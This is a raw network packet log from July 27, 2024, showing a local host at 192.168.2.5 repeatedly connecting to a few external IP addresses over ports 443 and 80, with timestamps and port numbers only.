Jul 27, 2024 07:32:34.471633911 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:34.471730947 CEST	51909	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:34.474112988 CEST	51909	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:34.474134922 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:34.474196911 CEST	51909	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:34.474206924 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:34.474366903 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:34.474524975 CEST	51909	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:34.516586065 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:34.909446955 CEST	80	51908	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:34.909483910 CEST	80	51908	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:34.909549952 CEST	51908	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:34.909697056 CEST	51908	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:34.914448023 CEST	80	51908	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:35.826081991 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:35.826172113 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:35.826236010 CEST	51909	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:35.842278957 CEST	51909	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:35.842303991 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:35.842330933 CEST	51909	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:35.842338085 CEST	443	51909	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:35.954926014 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:35.954976082 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:35.955053091 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:35.955676079 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:35.955696106 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:36.578628063 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:36.578713894 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:36.581073999 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:36.581085920 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:36.581135988 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:36.581141949 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:36.581186056 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:36.581191063 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:36.581336975 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:36.581448078 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:36.624517918 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:37.985238075 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:37.985721111 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:37.985783100 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:38.006804943 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:38.006830931 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:38.006855965 CEST	51910	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:38.006863117 CEST	443	51910	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:38.111219883 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.111260891 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:38.111466885 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.111723900 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.111735106 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:38.787262917 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:38.787353039 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.790148020 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.790158033 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:38.790230989 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.790236950 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:38.790283918 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.790287971 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:38.790375948 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:38.790509939 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:38.836494923 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:39.768039942 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:39.768111944 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:39.768156052 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:39.783703089 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:39.783726931 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:39.783741951 CEST	51911	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:39.783749104 CEST	443	51911	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:39.897344112 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:39.897443056 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:39.897542000 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:39.902403116 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:39.902440071 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:40.496063948 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:40.496186018 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:40.498804092 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:40.498823881 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:40.498883963 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:40.498895884 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:40.498953104 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:40.498963118 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:40.499052048 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:40.499211073 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:40.499242067 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:41.646125078 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:41.646192074 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:41.646239996 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:41.661354065 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:41.661375046 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:41.661410093 CEST	51912	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:41.661416054 CEST	443	51912	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:41.767446995 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:41.767484903 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:41.767549038 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:41.767940044 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:41.767956972 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:42.333996058 CEST	51914	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:42.339248896 CEST	80	51914	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:42.339339972 CEST	51914	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:42.339493990 CEST	51914	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:42.339519978 CEST	51914	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:42.344366074 CEST	80	51914	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:42.344396114 CEST	80	51914	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:42.368916988 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:42.369002104 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:42.371566057 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:42.371573925 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:42.371618986 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:42.371623993 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:42.371670008 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:42.371675014 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:42.371792078 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:42.371906996 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:42.412534952 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:43.542148113 CEST	80	51914	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:43.542243958 CEST	80	51914	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:43.542295933 CEST	51914	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:43.542398930 CEST	51914	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:43.547188044 CEST	80	51914	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:43.626697063 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:43.626770973 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:43.626822948 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:43.642666101 CEST	51913	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:43.642683029 CEST	443	51913	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:43.751703978 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:43.751737118 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:43.751805067 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:43.752188921 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:43.752207041 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:44.417747974 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:44.417929888 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:44.425343037 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:44.425354004 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:44.425422907 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:44.425429106 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:44.425471067 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:44.425476074 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:44.425569057 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:44.425673962 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:44.468532085 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:45.441147089 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:45.441348076 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:45.441410065 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:45.457530975 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:45.457557917 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:45.457573891 CEST	51915	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:45.457581997 CEST	443	51915	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:45.564315081 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:45.564425945 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:45.564527035 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:45.564954996 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:45.564987898 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:46.192424059 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:46.192545891 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:46.194978952 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:46.195003986 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:46.195070982 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:46.195080996 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:46.195133924 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:46.195143938 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:46.195348978 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:46.195553064 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:46.236522913 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:47.444885969 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:47.445086956 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:47.445178032 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:47.461055994 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:47.461108923 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:47.461137056 CEST	51916	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:47.461153984 CEST	443	51916	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:47.564351082 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:47.564402103 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:47.564475060 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:47.564908981 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:47.564939022 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:48.166026115 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:48.166251898 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:48.168864965 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:48.168889046 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:48.168953896 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:48.168965101 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:48.169229031 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:48.169375896 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:48.212543964 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:49.523647070 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:49.523828983 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:49.523909092 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:49.539968014 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:49.540008068 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:49.540040970 CEST	51917	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:49.540055990 CEST	443	51917	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:49.642349005 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:49.642373085 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:49.642440081 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:49.642738104 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:49.642746925 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:50.297627926 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:50.297789097 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:50.299864054 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:50.299870014 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:50.299938917 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:50.299942970 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:50.299983025 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:50.299985886 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:50.300198078 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:50.300355911 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:50.300367117 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:51.107539892 CEST	51919	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:51.112983942 CEST	80	51919	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:51.113078117 CEST	51919	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:51.113221884 CEST	51919	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:51.113245010 CEST	51919	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:51.118223906 CEST	80	51919	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:51.118238926 CEST	80	51919	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:51.232469082 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:51.232609987 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:51.232665062 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:51.253185987 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:51.253204107 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:51.253232002 CEST	51918	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:51.253237009 CEST	443	51918	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:51.367202044 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:51.367290020 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:51.367455006 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:51.373214006 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:51.373250961 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:51.967063904 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:51.967245102 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:51.969295979 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:51.969309092 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:51.969351053 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:51.969355106 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:51.969402075 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:51.969404936 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:51.969640970 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:51.969754934 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:52.012535095 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:52.359802961 CEST	80	51919	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:52.360250950 CEST	80	51919	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:52.360327005 CEST	51919	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:52.360397100 CEST	51919	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:32:52.365413904 CEST	80	51919	177.222.41.236	192.168.2.5
Jul 27, 2024 07:32:53.309662104 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:53.309763908 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:53.309844971 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:53.325706005 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:53.325706005 CEST	51920	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:53.325747967 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:53.325774908 CEST	443	51920	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:53.439326048 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:53.439402103 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:53.439491987 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:53.439893961 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:53.439927101 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:54.047321081 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:54.047533989 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:54.050067902 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:54.050077915 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:54.050126076 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:54.050129890 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:54.050177097 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:54.050179958 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:54.050410986 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:54.050569057 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:54.092572927 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:55.405587912 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:55.405767918 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:55.405849934 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:55.422136068 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:55.422137022 CEST	51921	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:55.422187090 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:55.422213078 CEST	443	51921	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:55.532937050 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:55.533020020 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:55.533107996 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:55.533452034 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:55.533476114 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:56.212506056 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:56.212610960 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:56.215403080 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:56.215428114 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:56.215491056 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:56.215502977 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:56.215557098 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:56.215567112 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:56.216207027 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:56.216393948 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:56.260504007 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:57.237790108 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:57.238306046 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:57.238384962 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:57.253720999 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:57.253765106 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:57.253793955 CEST	51922	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:32:57.253810883 CEST	443	51922	167.235.128.153	192.168.2.5
Jul 27, 2024 07:32:57.361099005 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:57.361197948 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:57.361288071 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:57.361783028 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:57.361824036 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:57.956162930 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:57.956374884 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:57.958412886 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:57.958444118 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:57.958524942 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:57.958538055 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:57.958801031 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:57.958930016 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:58.000539064 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:59.266212940 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:59.266400099 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:59.266505957 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:59.281060934 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:59.281060934 CEST	51923	443	192.168.2.5	107.173.160.137
Jul 27, 2024 07:32:59.281107903 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:59.281142950 CEST	443	51923	107.173.160.137	192.168.2.5
Jul 27, 2024 07:32:59.392481089 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.392580986 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:59.392667055 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.393181086 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.393219948 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:59.988179922 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:59.988260984 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.991097927 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.991127968 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:59.991178989 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.991192102 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:59.991245031 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.991254091 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:59.991485119 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:32:59.991616964 CEST	51924	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:32:59.991646051 CEST	443	51924	107.173.160.139	192.168.2.5
Jul 27, 2024 07:33:00.261033058 CEST	51925	80	192.168.2.5	177.222.41.236
Jul 27, 2024 07:33:00.266314983 CEST	80	51925	177.222.41.236	192.168.2.5
